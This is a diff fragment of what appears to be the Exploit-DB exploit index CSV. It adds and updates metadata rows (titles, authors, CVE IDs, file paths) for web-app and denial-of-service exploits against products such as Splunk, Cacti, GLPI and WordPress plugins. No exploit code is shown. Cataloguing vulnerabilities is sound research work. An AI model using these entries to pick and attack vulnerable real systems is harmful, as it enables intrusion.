 23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",dos,multiple,,2003-09-24,2012-12-06,1,OSVDB-3571,,,,,https://www.securityfocus.com/bid/8697/info
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,,2020-12-17,2021-01-11,0,CVE-2020-35488,,,,,
 10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389,2009-11-08,,1,,,,,,https://www.securityfocus.com/bid/27778/info
+51746,exploits/multiple/dos/51746.txt,"OpenPLC WebServer 3 - Denial of Service",2023-10-09,"Kai Feng",dos,multiple,,2023-10-09,2023-10-09,0,,,,,,
 17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,,2011-08-05,2011-08-05,0,CVE-2010-3609,,,,http://www.exploit-db.comopenslp-1.2.1.tar.gz,
 2444,exploits/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",dos,multiple,,2006-09-26,2016-09-12,1,OSVDB-29152;CVE-2006-4924,,,,http://www.exploit-db.comopenssh-4.1p1.tar.gz,
 18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",dos,multiple,,2012-04-19,2012-04-19,1,CVE-2012-2131;OSVDB-81223;CVE-2012-2110,,,,,
@@ -12172,6 +12179,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",webapps,multiple,,2014-02-28,2014-02-28,0,CVE-2013-6231;OSVDB-103890,,,,,
 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,,2020-09-18,2020-09-18,0,CVE-2020-11804;CVE-2020-11803;CVE-2020-11700;CVE-2020-11699,,,,,
 21053,exploits/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",webapps,multiple,,2012-09-04,2012-09-04,0,OSVDB-85824,,,,,
+51747,exploits/multiple/webapps/51747.py,"Splunk 9.0.5 - admin account take over",2023-10-09,"Redway Security",webapps,multiple,,2023-10-09,2023-10-09,0,CVE-2023-32707,,,,,
 41779,exploits/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,webapps,multiple,,2017-03-31,2017-03-31,1,CVE-2017-5607,,,,,
 40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple,,2016-12-09,2016-12-09,1,,,,,,
 49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,,2020-12-21,2020-12-21,0,,,,,,
@@ -14990,6 +14998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11249,exploits/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,webapps,php,,2010-01-23,,0,,,,,,
 18676,exploits/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,webapps,php,,2012-03-28,2012-08-13,1,OSVDB-80660,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-06-at-21926-pm.png,http://www.exploit-db.combmachine-3.1.zip,
 5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php,,2008-06-17,2016-12-08,1,OSVDB-46425;CVE-2008-2846,,,,,
+51741,exploits/php/webapps/51741.py,"BoidCMS v2.0.0 - authenticated file upload vulnerability",2023-10-09,1337kid,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-38836,,,,,
 30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38668,,,,,https://www.securityfocus.com/bid/25644/info
 30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php,,2007-09-12,2013-12-29,1,CVE-2007-4899;OSVDB-38669,,,,,https://www.securityfocus.com/bid/25644/info
 2153,exploits/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",webapps,php,,2006-08-08,,1,OSVDB-29747;CVE-2006-4123,,,,,
@@ -15226,6 +15235,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",webapps,php,,2010-04-21,,1,CVE-2010-1431;OSVDB-63967,,Bonsai-SQL_Injection_in_Cacti.pdf,,,
 33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info
 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,,
+51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,,
 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
@@ -15569,7 +15579,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
 15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
 7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
-51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
+51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-10-09,0,CVE-2023-31714,,,,,
 31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
 31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
 31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
@@ -15719,6 +15729,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3542,exploits/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,webapps,php,,2007-03-21,2016-09-30,1,OSVDB-37215;CVE-2007-1640;OSVDB-37214,,,,http://www.exploit-db.comclassweb_2.03.tar.gz,
 34365,exploits/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",webapps,php,,2010-07-22,2014-08-19,1,,,,,,https://www.securityfocus.com/bid/41885/info
 42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-24,2017-09-24,0,CVE-2017-14704,,,,,
+51729,exploits/php/webapps/51729.txt,"Clcknshop 1.0.0 - SQL Injection",2023-10-09,CraCkEr,webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4708,,,,,
 7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,webapps,php,,2008-11-24,2017-01-03,1,OSVDB-50174;CVE-2008-5289,,,,,
 7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-50174;CVE-2008-5290;OSVDB-50172;CVE-2008-5289,,,,,
 46146,exploits/php/webapps/46146.txt,"Cleanto 5.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80,2019-01-14,2019-01-14,0,,"SQL Injection (SQLi)",,,,
@@ -16213,6 +16224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",webapps,php,,2007-11-24,2014-01-09,1,,,,,,https://www.securityfocus.com/bid/26558/info
 27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,webapps,php,,2006-04-17,2013-08-18,1,CVE-2006-1909;OSVDB-24744,,,,,https://www.securityfocus.com/bid/17570/info
 18680,exploits/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,webapps,php,,2012-03-30,2012-03-30,1,OSVDB-80735;OSVDB-80734;OSVDB-80733;OSVDB-80732;OSVDB-80731;CVE-2012-1614;CVE-2012-1613,,,,http://www.exploit-db.comcpg1.5.18.7z,http://www.waraxe.us/advisory-81.html
+51738,exploits/php/webapps/51738.txt,"Coppermine Gallery 1.6.25 - RCE",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 41876,exploits/php/webapps/41876.txt,"Coppermine Gallery < 1.5.44 - Directory Traversal",2017-02-15,"Hacker Fantastic",webapps,php,,2017-04-13,2019-03-28,0,,,,,,https://github.com/HackerFantastic/Public/blob/9a2eaaab7d8ea74afeb45703db106b2c0ab47fba/exploits/cpg15x-dirtraversal.txt
 37437,exploits/php/webapps/37437.txt,"Coppermine Photo Gallery - 'index.php' Script SQL Injection",2012-06-20,"Taurus Omar",webapps,php,,2012-06-20,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54115/info
 22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",webapps,php,,2003-04-07,2012-11-12,1,OSVDB-50624,,,,,https://www.securityfocus.com/bid/7300/info
@@ -16407,7 +16419,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,,
 31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info
 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info
-51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,,
+51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-10-09,0,CVE-2023-37759,,,,,
 32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info
 27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info
 31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info
@@ -19162,6 +19174,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,,
 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,,
+51726,exploits/php/webapps/51726.py,"GLPI GZIP(Py3) 9.4.5 - RCE",2023-10-09,"Brian Peters",webapps,php,,2023-10-09,2023-10-09,0,CVE-2020-11060,,,,,
 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,,
 34758,exploits/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111920;OSVDB-111919,,,,,http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
 34759,exploits/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,webapps,php,80,2014-09-24,2014-09-24,0,OSVDB-111921,,,,,http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
@@ -22489,6 +22502,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11478,exploits/php/webapps/11478.txt,"Limny 2.0 - Cross-Site Request Forgery (Create Admin User)",2010-02-16,"Luis Santana",webapps,php,,2010-02-15,,0,OSVDB-62389;CVE-2010-0709,,,,,
 34198,exploits/php/webapps/34198.txt,"Limny 2.1 - 'q' Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",webapps,php,,2010-06-24,2014-07-29,1,,,,,,https://www.securityfocus.com/bid/41152/info
 36494,exploits/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5343;OSVDB-78093,,,,,https://www.securityfocus.com/bid/51261/info
+51744,exploits/php/webapps/51744.txt,"Limo Booking Software v1.0 - CORS",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,,2013-11-17,2015-11-30,1,OSVDB-99993,,,,,https://www.securityfocus.com/bid/63771/info
 34811,exploits/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Cross-Site Scripting",2009-07-08,"599eme Man",webapps,php,,2009-07-08,2014-09-29,1,CVE-2009-2442;OSVDB-55741,,,,,https://www.securityfocus.com/bid/43711/info
 10736,exploits/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,,
@@ -23149,6 +23163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php,,2020-10-12,2020-10-12,0,,,,,,
 45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80,2018-09-07,2018-09-07,0,,"SQL Injection (SQLi)",,,,
 3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,,1,OSVDB-36239;CVE-2007-2706,,,,,
+51737,exploits/php/webapps/51737.txt,"Media Library Assistant Wordpress Plugin - RCE and LFI",2023-10-09,"Florent MONTEL",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4634,,,,,
 41557,exploits/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 12141,exploits/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",webapps,php,,2010-04-10,,1,OSVDB-63842,,,,,
 17292,exploits/php/webapps/17292.txt,"MediaInSpot CMS - Local File Inclusion (2)",2011-05-16,"wlhaan haker",webapps,php,,2011-05-16,2011-05-16,1,,,,,,
@@ -24781,6 +24796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49431,exploits/php/webapps/49431.txt,"Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
 49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,,2021-01-13,2021-01-13,0,,,,,,
 49430,exploits/php/webapps/49430.txt,"Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)",2021-01-15,"Mesut Cetin",webapps,php,,2021-01-15,2021-01-15,0,,,,,,
+51728,exploits/php/webapps/51728.txt,"Online ID Generator 1.0 - Remote Code Execution (RCE)",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,,2021-02-16,2021-02-16,0,,,,,,
 47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-11-29,2019-11-29,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comonline-inventory-manager-3.2.zip,
 42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",webapps,php,,2017-09-07,2017-09-07,0,,,,,,
@@ -29378,6 +29394,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,webapps,php,,2007-04-16,2011-04-27,1,OSVDB-34999;CVE-2007-2141,,,,http://www.exploit-db.comShoutPro1.5.2.zip,
 50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",2022-05-17,"Akshay Ravi",webapps,php,,2022-05-17,2022-05-24,0,CVE-2022-0967,,,,,
 8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,webapps,php,,2009-05-13,,1,OSVDB-54503;CVE-2009-1650,,,,,
+51745,exploits/php/webapps/51745.txt,"Shuttle-Booking-Software v1.0 - Multiple-SQLi",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 45773,exploits/php/webapps/45773.txt,"SiAdmin 1.1 - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comSiAdmin-1.1.zip,
 36482,exploits/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,webapps,php,,2012-01-01,2015-03-25,1,,,,,,https://www.securityfocus.com/bid/51218/info
 12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,webapps,php,,2010-04-15,,1,OSVDB-63837;CVE-2010-1711;OSVDB-63836;CVE-2010-1710,,,,,
@@ -32151,6 +32168,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
+51743,exploits/php/webapps/51743.txt,"Webedition CMS v2.9.8.8 - Blind SSRF",2023-10-09,"Mirabbas Ağalarov",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
 51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
@@ -32206,6 +32224,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,0,OSVDB-85662,,,,,
 19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php,,2012-07-04,2012-07-04,1,OSVDB-83688,,,,http://www.exploit-db.comWebifyLinkDirectory.zip,
 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
+51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
 46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
@@ -33177,6 +33196,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",webapps,php,,2015-03-24,2015-03-24,0,CVE-2014-9014;CVE-2014-9013;OSVDB-115631,,,,,
 36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",webapps,php,,2015-03-25,2016-10-27,0,CVE-2014-9014;OSVDB-115631;CVE-2014-9013,,,,,
 18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php,,2012-06-05,2012-06-05,1,OSVDB-81143,"WordPress Plugin",,,http://www.exploit-db.comwpmarketplace.zip,
+51735,exploits/php/webapps/51735.py,"Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation",2023-10-09,"Revan Arifio",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4278,,,,,
 50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",2022-02-18,"numan türle",webapps,php,,2022-02-18,2022-02-18,0,CVE-2022-0441,,,,,
 24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",webapps,php,,2013-03-26,2013-03-26,1,OSVDB-91737,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-26-at-105329-am.png,,
 37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",webapps,php,80,2015-08-21,2015-08-21,0,CVE-2015-6805;OSVDB-126598,"WordPress Plugin",,,http://www.exploit-db.commdc-private-message.zip,
@@ -33810,6 +33830,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info
 37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,,
 17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip,
+51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
 49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,,
 38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,webapps,php,,2013-06-09,2015-10-30,1,,,,,,https://www.securityfocus.com/bid/60458/info
@@ -40772,6 +40793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk
